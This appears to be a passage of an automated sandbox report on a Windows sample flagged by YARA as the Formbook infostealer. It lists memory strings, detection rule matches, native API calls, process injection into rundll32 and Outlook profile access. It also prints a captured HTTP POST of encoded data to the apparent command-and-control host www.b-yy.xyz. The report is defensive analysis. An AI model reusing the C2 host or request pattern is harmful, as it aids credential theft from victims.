        Source: rundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com/certificado-ssl?utm_source=parking&amp;utm_medium=link&amp;utm_campa
        Source: rundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com/crear-web?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=we
        Source: rundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com/dominios?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=dom
        Source: rundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com/hosting?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=host
        Source: rundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com/ssl?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=correo
        Source: rundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com/web-sencilla?utm_source=parking&amp;utm_medium=link&amp;utm_campaign
        Source: rundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=piensa
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.realestatewithstacie.com/
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.staciesellslka.com
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.staciesellslka.com/
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.staciesellslka.com/about/
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.staciesellslka.com/blog/
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.staciesellslka.com/comments/feed/
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.staciesellslka.com/contact-me/
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.staciesellslka.com/feed/
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.staciesellslka.com/homes-for-sale-search/
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.staciesellslka.com/lake-anna/
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.staciesellslka.com/mortgage-calculator/
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.staciesellslka.com/open-home-search/
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.staciesellslka.com/properties/
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.staciesellslka.com/wp-admin/admin-ajax.php
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.staciesellslka.com/wp-content/uploads/2023/01/white-logo-300.fw_.fw_-200x71.png
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.staciesellslka.com/wp-content/uploads/2023/01/white-logo-300.fw_.fw_.png
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.staciesellslka.com/wp-content/uploads/2023/02/realtor-logo.fw_.png
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.staciesellslka.com/wp-content/uploads/fusion-gfonts/KFOmCnqEu92Fr1Mu4mxK.woff2
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.staciesellslka.com/wp-content/uploads/fusion-gfonts/dg4n_p3sv6gCJkwzT6RXiJwo.woff2
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.staciesellslka.com/wp-content/uploads/fusion-gfonts/o-0IIpQlx3QUlC5A4PNr5TRA.woff2
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.staciesellslka.com/wp-content/uploads/fusion-icons/mechanic-icon-set/fonts/mechanic.ttf?
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.staciesellslka.com/wp-content/uploads/fusion-icons/psychology-v1.1/fonts/psychology.ttf?
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.staciesellslka.com/wp-json/
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.staciesellslka.com/xmlrpc.php?rsd
        Source: unknownHTTP traffic detected: POST /dhxt/ HTTP/1.1Host: www.b-yy.xyzConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.b-yy.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.b-yy.xyz/dhxt/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 6c 6b 41 48 6e 73 49 3d 76 73 58 6e 28 6d 71 75 28 4b 67 77 68 2d 39 47 63 2d 4f 66 32 44 4f 7a 75 6e 69 66 4b 4c 28 36 77 72 56 4e 59 71 65 43 63 44 6a 57 68 62 77 32 59 34 34 7a 47 36 63 41 67 7a 70 65 79 47 4e 47 67 58 5a 6f 78 66 67 32 34 53 64 70 68 4a 62 48 65 5a 38 34 53 4b 4e 74 63 36 69 6d 59 45 34 35 75 39 49 4a 7a 78 5a 4d 55 36 68 75 75 70 6f 48 4a 6f 68 59 75 66 4b 77 72 63 48 65 50 6b 64 6c 4c 4b 67 33 50 66 72 56 54 47 39 39 4b 77 78 76 36 34 5a 43 43 6a 36 56 4c 53 74 75 32 50 34 31 33 43 61 6b 68 37 57 69 77 43 38 6e 4f 57 6d 5f 4b 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: UlkAHnsI=vsXn(mqu(Kgwh-9Gc-Of2DOzunifKL(6wrVNYqeCcDjWhbw2Y44zG6cAgzpeyGNGgXZoxfg24SdphJbHeZ84SKNtc6imYE45u9IJzxZMU6huupoHJohYufKwrcHePkdlLKg3PfrVTG99Kwxv64ZCCj6VLStu2P413Cakh7WiwC8nOWm_Kw).
        Source: unknown; DNS traffic detected: queries for: www.utmedicined.com

        E-Banking Fraud

        Source: Yara match; File source: 0.2.zeuhAxTIRX.exe.e50000.1.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 00000000.00000002.576146371.0000000000810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000008.00000002.830673789.00000000041A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
        Source: Yara match; File source: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000008.00000002.830024885.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000000.00000002.576236738.0000000000840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        System Summary

        Source: 0.2.zeuhAxTIRX.exe.e50000.1.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
        Source: 0.2.zeuhAxTIRX.exe.e50000.1.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000000.00000002.576146371.0000000000810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
        Source: 00000000.00000002.576146371.0000000000810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000008.00000002.830673789.00000000041A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
        Source: 00000008.00000002.830673789.00000000041A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
        Source: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
        Source: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000008.00000002.830024885.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
        Source: 00000008.00000002.830024885.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000000.00000002.576236738.0000000000840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
        Source: 00000000.00000002.576236738.0000000000840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: zeuhAxTIRX.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: 0.2.zeuhAxTIRX.exe.e50000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0.2.zeuhAxTIRX.exe.e50000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000000.00000002.576146371.0000000000810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000000.00000002.576146371.0000000000810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000008.00000002.830673789.00000000041A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000008.00000002.830673789.00000000041A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000008.00000002.830024885.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000008.00000002.830024885.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000000.00000002.576236738.0000000000840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000000.00000002.576236738.0000000000840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0440B150 appears 39 times
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exeCode function: 0_2_00E6E5A3 NtCreateFile,0_2_00E6E5A3
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exeCode function: 0_2_00E6E6D3 NtClose,0_2_00E6E6D3
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exeCode function: 0_2_00E6E653 NtReadFile,0_2_00E6E653
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exeCode function: 0_2_00E6E783 NtAllocateVirtualMemory,0_2_00E6E783
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04449540 NtReadFile,LdrInitializeThunk,8_2_04449540
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04449560 NtWriteFile,LdrInitializeThunk,8_2_04449560
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044495D0 NtClose,LdrInitializeThunk,8_2_044495D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04449650 NtQueryValueKey,LdrInitializeThunk,8_2_04449650
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04449660 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_04449660
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04449610 NtEnumerateValueKey,LdrInitializeThunk,8_2_04449610
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044496D0 NtCreateKey,LdrInitializeThunk,8_2_044496D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044496E0 NtFreeVirtualMemory,LdrInitializeThunk,8_2_044496E0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04449710 NtQueryInformationToken,LdrInitializeThunk,8_2_04449710
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04449FE0 NtCreateMutant,LdrInitializeThunk,8_2_04449FE0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04449780 NtMapViewOfSection,LdrInitializeThunk,8_2_04449780
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04449840 NtDelayExecution,LdrInitializeThunk,8_2_04449840
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04449860 NtQuerySystemInformation,LdrInitializeThunk,8_2_04449860
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04449910 NtAdjustPrivilegesToken,LdrInitializeThunk,8_2_04449910
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044499A0 NtCreateSection,LdrInitializeThunk,8_2_044499A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04449A50 NtCreateFile,LdrInitializeThunk,8_2_04449A50
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04449520 NtWaitForSingleObject,8_2_04449520
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0444AD30 NtSetContextThread,8_2_0444AD30
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044495F0 NtQueryInformationFile,8_2_044495F0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04449670 NtQueryInformationProcess,8_2_04449670
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04449760 NtOpenProcess,8_2_04449760
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0444A770 NtOpenThread,8_2_0444A770
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04449770 NtSetInformationFile,8_2_04449770
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0444A710 NtOpenProcessToken,8_2_0444A710
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04449730 NtQueryVirtualMemory,8_2_04449730
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044497A0 NtUnmapViewOfSection,8_2_044497A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0444B040 NtSuspendThread,8_2_0444B040
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04449820 NtEnumerateKey,8_2_04449820
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044498F0 NtReadVirtualMemory,8_2_044498F0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044498A0 NtWriteVirtualMemory,8_2_044498A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04449950 NtQueueApcThread,8_2_04449950
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044499D0 NtCreateProcessEx,8_2_044499D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04449A00 NtProtectVirtualMemory,8_2_04449A00
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04449A10 NtQuerySection,8_2_04449A10
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04449A20 NtResumeThread,8_2_04449A20
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04449A80 NtOpenDirectoryObject,8_2_04449A80
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04449B00 NtSetValueKey,8_2_04449B00
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0444A3B0 NtGetContextThread,8_2_0444A3B0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02A6C880 NtReadFile,8_2_02A6C880
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02A6C8D0 NtDeleteFile,8_2_02A6C8D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02A6C9B0 NtAllocateVirtualMemory,8_2_02A6C9B0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02A6C900 NtClose,8_2_02A6C900
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02A6C7D0 NtCreateFile,8_2_02A6C7D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02A6C8FB NtClose,8_2_02A6C8FB
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02A6C8CA NtDeleteFile,8_2_02A6C8CA
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02A6C7CB NtCreateFile,8_2_02A6C7CB
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exeProcess Stats: CPU usage > 98%
        Source: zeuhAxTIRX.exeStatic PE information: No import functions for PE file found
        Source: zeuhAxTIRX.exe, 00000000.00000003.526888112.0000000000D07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs zeuhAxTIRX.exe
        Source: zeuhAxTIRX.exe, 00000000.00000002.576940638.0000000000F9F000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs zeuhAxTIRX.exe
        Source: zeuhAxTIRX.exe, 00000000.00000003.525576790.0000000000B5C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs zeuhAxTIRX.exe
        Source: zeuhAxTIRX.exe, 00000000.00000002.576940638.000000000112F000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs zeuhAxTIRX.exe
        Source: zeuhAxTIRX.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: zeuhAxTIRX.exeStatic PE information: Section .text
        Source: zeuhAxTIRX.exeReversingLabs: Detection: 56%
        Source: zeuhAxTIRX.exeVirustotal: Detection: 54%
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknownProcess created: C:\Users\user\Desktop\zeuhAxTIRX.exe C:\Users\user\Desktop\zeuhAxTIRX.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
        Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0bf754aa-c967-445c-ab3d-d8fda9bae7ef}\InProcServer32
        Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\j-E8-1M
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/1@13/13
        Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
        Source: zeuhAxTIRX.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: Binary string: wntdll.pdbUGP source: zeuhAxTIRX.exe, 00000000.00000003.525576790.0000000000A46000.00000004.00000020.00020000.00000000.sdmp, zeuhAxTIRX.exe, 00000000.00000002.576940638.0000000000F9F000.00000040.00001000.00020000.00000000.sdmp, zeuhAxTIRX.exe, 00000000.00000002.576940638.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, zeuhAxTIRX.exe, 00000000.00000003.526888112.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.578096902.0000000004242000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.575803358.00000000040AA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: zeuhAxTIRX.exe, 00000000.00000003.525576790.0000000000A46000.00000004.00000020.00020000.00000000.sdmp, zeuhAxTIRX.exe, 00000000.00000002.576940638.0000000000F9F000.00000040.00001000.00020000.00000000.sdmp, zeuhAxTIRX.exe, 00000000.00000002.576940638.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, zeuhAxTIRX.exe, 00000000.00000003.526888112.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.578096902.0000000004242000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.575803358.00000000040AA000.00000004.00000020.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exeCode function: 0_2_00E56030 push edi; retf 0_2_00E5603F
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exeCode function: 0_2_00E5195A push cs; retf 0_2_00E51967
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exeCode function: 0_2_00E51DD0 push eax; ret 0_2_00E51DD2
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exeCode function: 0_2_00E61584 push edi; retf 0_2_00E61587
